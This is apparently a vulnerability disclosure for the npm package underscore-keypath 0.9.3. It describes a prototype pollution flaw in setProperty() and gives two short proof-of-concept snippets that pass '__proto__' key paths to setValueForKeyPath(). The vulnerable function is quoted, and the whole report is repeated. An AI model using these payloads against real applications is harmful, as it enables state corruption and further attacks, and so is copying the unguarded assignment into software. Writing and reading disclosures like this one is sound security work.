lelecolacola123/Critical point of pollution and POC Secret

## Critical point of pollution and POC
1、Affected module
the prototype pollution is affected the “underscore-keypath@0.9.3 ”
key-path mechanism extensions for underscore (mixin).
underscore-keypath let you access JavaScript objects and arrays with keypath easily.
2、relevant package manager/ecosystem
NPM ecosystem
3、vulnerability details
prototype pollution vulnerability in function setProperty() in underscore-keypath.js in underscore-keypath@0.9.3
the function setProperty() :line 162 obj[name] = value  is the point of prototype pollution
4、steps to reproduce
the entry function is setValueForKeyPath(), the function doesn't judge the arguments like“__proto__” ，pass the bad input like “__proto__”  into the function，and then into the setProperty() function，lead to the prototype pollution.
var underscore =require("underscore-keypath")
//the first POC
// BAD_ARRAY2 = ['__proto__', 'prop']
// console.log("Before: "+{}.prop)
// underscore.setValueForKeyPath({},BAD_ARRAY2,"polluted")
// console.log("After: "+{}.prop)

//the second POC
console.log("Before: "+{}.prop)
BAD_path = "__proto__.prop"
underscore.setValueForKeyPath({},BAD_path,"polluted")
console.log("After: "+{}.prop)
5、my credit：Yuhan Gao (gyhlelecola@163.com), Peng Zhou (zpbrent@gmail.com)
If you receives my email, please give me a reply. I look forward to  your reply

## polluted.js

	function setProperty(obj, name, value) {
		"use strict";
		var setter = obj["set" + capitalize(name)];
		if (setter) {
			return setter.call(obj, value);
		}

		if (name.indexOf("@") === 0) {
			return setArrayProperty(obj, name, value);
		}

		obj[name] = value;
		return value;
	}
	1、Affected module
	the prototype pollution is affected the “underscore-keypath@0.9.3 ”
	key-path mechanism extensions for underscore (mixin).
	underscore-keypath let you access JavaScript objects and arrays with keypath easily.
	2、relevant package manager/ecosystem
	NPM ecosystem
	3、vulnerability details
	prototype pollution vulnerability in function setProperty() in underscore-keypath.js in underscore-keypath@0.9.3
	the function setProperty() :line 162 obj[name] = value is the point of prototype pollution
	4、steps to reproduce
	the entry function is setValueForKeyPath(), the function doesn't judge the arguments like“__proto__” ，pass the bad input like “__proto__” into the function，and then into the setProperty() function，lead to the prototype pollution.
	var underscore =require("underscore-keypath")
	//the first POC
	// BAD_ARRAY2 = ['__proto__', 'prop']
	// console.log("Before: "+{}.prop)
	// underscore.setValueForKeyPath({},BAD_ARRAY2,"polluted")
	// console.log("After: "+{}.prop)

	//the second POC
	console.log("Before: "+{}.prop)
	BAD_path = "__proto__.prop"
	underscore.setValueForKeyPath({},BAD_path,"polluted")
	console.log("After: "+{}.prop)
	5、my credit：Yuhan Gao (gyhlelecola@163.com), Peng Zhou (zpbrent@gmail.com)
	If you receives my email, please give me a reply. I look forward to your reply

	function setProperty(obj, name, value) {
	"use strict";
	var setter = obj["set" + capitalize(name)];
	if (setter) {
	return setter.call(obj, value);
	}

	if (name.indexOf("@") === 0) {
	return setArrayProperty(obj, name, value);
	}

	obj[name] = value;
	return value;
	}